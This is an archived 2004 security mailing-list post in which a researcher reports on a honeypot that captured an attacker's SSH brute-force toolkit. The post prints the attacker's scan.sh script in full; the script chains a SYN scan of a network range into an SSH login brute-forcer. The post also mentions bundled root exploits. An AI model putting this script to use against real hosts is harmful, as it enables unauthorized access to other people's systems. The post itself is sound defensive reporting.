lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040729060545.GC5152@bumboclaat.ebat.org>
From: jethro at docisland.org (Jerome)
Subject: about the automated ssh login attempts

Hi list,

setting up a honeypot, I was able to identify some of the activity
associated with these login attempts. 
after the honeypot's been probed for guest and test login, I had someone
login as test and fetch some tools from websites to use them on the
honeypot.

tools were fetched from some .ro website as per .bash_history and
captured keystrokes.

the toolkit I had the opportunity to have downloaded by the kid on the
honeypot was made of a bunch of components:

- ss : a copy of the "very fast" syn scanner by haitateam published
  latetly, at least on packetstorm

- haita: apparently the tool used to bruteforce accounts

	strings -a haita | grep SSH
	SSH login bruteforcer by HaitaTeam
	
	*tho* guest and test accounts seem hardcoded, so unless they fix
	that, it's not gonna be a big threat for all of the other joes
	accounts around.

and the final part:

- scan.sh: which is the kiddie's best friend for using these 2 tools
  altogether:

#!/bin/sh
if [ $# != 1 ]
then
	echo "Se da asa:"
	echo "$0 <clasa b>"
	echo "Exemplu:"
	echo "$0 212.93"
	echo "Daca nu prindeti ... verificati in fisieru \
asta sa fie pusa placa de retea care trebe adika \
eth0, eth1, ppp0 etc "

	exit
fi
rm -f bios.txt vuln.txt uniq.txt
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./haita
			
I also had some other toolkits on the honeypot after the breakin, most
of them being local root exploits packed in a single archive, and some
massrooter for years old remote vulnerabilities, but we all know them.

I can provide with the bins if anyone's interested, but didn't bother
yet to place them on some website, feel free to email.

cheers,

-- 
Jerome
[pgp keyid : 33D7802F http://pgp.mit.edu]
[key fingerprint : 82E6 C9C8 05D1 BEAC 9353  8ECB CEAF 6A0A 33D7 802F]


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ